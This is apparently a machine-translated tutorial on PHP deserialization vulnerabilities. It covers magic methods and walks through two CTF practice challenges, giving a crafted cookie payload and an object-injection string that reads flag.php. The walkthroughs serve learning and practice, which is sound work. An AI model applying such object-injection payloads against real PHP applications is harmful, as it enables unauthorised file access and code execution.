1. Key points
1. Principle
Serialization is to convert an object into a string. On the contrary, deserialization converts the format of the data. The serialization of the object facilitates the storage and transmission of the object, and allows multiple files to share the object.
2. Technology
(1) There is a class (class) that triggers the magic method
(2) Classless
3. Usage
Real application, in ctf competition
4. Harm
SQL injection, code execution, directory traversal, etc.
Two. PHP deserialization
Principle: The serialized string entered by the user is not detected, allowing the attacker to control the deserialization process, resulting in uncontrollable consequences such as code execution, SQL injection, and directory traversal. Certain magic methods are automatically triggered during serialization. When deserializing, it is possible to trigger some magic methods in the object.
serialize() //将一个对象转化成一个字符串
unserialize() //将一个字符串还原成一个对象
Trigger: The variables of the unserialize function are controllable, there are classes available in the file, and there are magic methods in the class
Case 1: PHP deserialization without class (local test)
Even if you use the opposite serialize() of unserialize(), === in php means the data type, and the values are the same
<?php
$key = 'abcd';
echo serialize($key);
?>The code execution result is s:4:"abcd";
The above url request can be completed.
If it is an integer, the result is as follows, just change the url to the execution result
<?php
$key = 123;
echo serialize($key);
?>
//执行结果 i:123;Case 2: Bugku Shooting Range -- Topic: No response after clicking login
Clicking login does not respond, check the source code, find admin.css click
Found a try? 5491 Try to add it to the url, and the following code appears for analysis
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['5491'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?> Idea: We can construct the serialization of BUGKU to be equal to the value of KEY to achieve the purpose of obtaining the flag,
so construct the serialization
Analysis can try to construct
Cookie: BUGKU=s:13:"ctf.bugku.com";Burp captures the packet and modifies the cookie value to release the packet
if(isset($_GET['5491'])){
show_source(__FILE__);
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
Pay attention to the analysis, if you add this 5491 parameter, the source code page will be displayed, and the key will not be compared, so do not add it to the url when capturing packets? 5491, just return the source address to capture the packet and modify the cookie
Case 3: PHP deserialization has classes
Example: Creating an object will automatically call the __construct() function
__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__construct() //创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发
CTFHub Shooting Range -- Title: AreUserialz
Only the results of the problem-solving are given here, refer to wp for details: buuctf beginners learning record--[Net Tripod Cup 2020 Qinglong Group]AreUSerialz_pakho_C's Blog-CSDN Blog
Analyze the source code and write out the solution:
O:10:"FileHander":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
There are unprintable characters after serialization of protected type attributes. A variable of the protected type will have %00*%00 characters during serialization, and the ASCII code of the %00 character is 0, so it cannot pass the above is_valid() verification, and the %00 character ascii code is 0, so it will not be displayed. There will be one more * in front of the variable
Private type attributes will also generate unprintable characters after serialization. For PHP version 7.1+, it is not sensitive to the type of the attribute. We can change the protected type to public to eliminate unprintable characters.
payload:
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
This question mainly practices the solution to the class situation in PHP deserialization, which includes knowledge points such as magic method and php weak type comparison